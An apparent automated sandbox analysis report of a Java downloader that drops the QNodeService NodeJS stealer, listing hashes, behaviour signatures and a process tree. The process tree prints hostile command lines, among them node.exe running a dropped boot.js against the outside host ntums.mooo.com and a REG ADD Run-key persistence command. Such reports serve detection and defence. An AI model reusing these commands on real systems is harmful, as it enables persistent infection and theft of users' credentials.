Analysis
-
max time kernel
74s -
max time network
113s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
23-11-2020 12:55
Static task
static1
Behavioral task
behavioral1
Sample
1.jar
Resource
win7v20201028
Behavioral task
behavioral2
Sample
1.jar
Resource
win10v20201028
General
-
Target
1.jar
-
Size
73KB
-
MD5
6608586b5b7cf330a74d4abbbd9006be
-
SHA1
8449eb2836086f220d645621a869d189696bca91
-
SHA256
1f89cb2ced0736bce39f66de5cfb11da41b9f87b8b13be3317f6b127f07cea24
-
SHA512
782919fd5ea5ace0ba94fd0ef4b8dc8009e772e414f41f85ac9d11db5096adc7fd881eafebe16695f230e2cc2a821cdec89582337cf1e1ee1939aa1fe826b1fb
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1444 node.exe 3508 node.exe 2684 node.exe -
Loads dropped DLL 6 IoCs
pid Process 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\51e26146-0307-4cc6-b4a2-ef4fcf65fed6 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab56-178.dat js behavioral2/files/0x000100000001ab56-181.dat js behavioral2/files/0x000100000001ab56-185.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 wtfismyip.com 23 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1444 node.exe 1444 node.exe 1444 node.exe 1444 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe 2684 node.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 796 wrote to memory of 2096 796 java.exe 76 PID 796 wrote to memory of 2096 796 java.exe 76 PID 2096 wrote to memory of 1444 2096 javaw.exe 80 PID 2096 wrote to memory of 1444 2096 javaw.exe 80 PID 1444 wrote to memory of 3508 1444 node.exe 82 PID 1444 wrote to memory of 3508 1444 node.exe 82 PID 3508 wrote to memory of 2684 3508 node.exe 83 PID 3508 wrote to memory of 2684 3508 node.exe 83 PID 2684 wrote to memory of 656 2684 node.exe 85 PID 2684 wrote to memory of 656 2684 node.exe 85 PID 656 wrote to memory of 2396 656 cmd.exe 86 PID 656 wrote to memory of 2396 656 cmd.exe 86 PID 2684 wrote to memory of 2828 2684 node.exe 87 PID 2684 wrote to memory of 2828 2684 node.exe 87 PID 2828 wrote to memory of 2316 2828 cmd.exe 88 PID 2828 wrote to memory of 2316 2828 cmd.exe 88
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\1.jar1⤵
- Suspicious use of WriteProcessMemory
PID:796 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\dd50d4a4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain ntums.mooo.com3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_bKMWvi\boot.js --hub-domain ntums.mooo.com4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_bKMWvi\boot.js --hub-domain ntums.mooo.com5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /F"6⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\reg.exeREG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "51e26146-0307-4cc6-b4a2-ef4fcf65fed6" /F7⤵PID:2316
-
-
-
-
-
-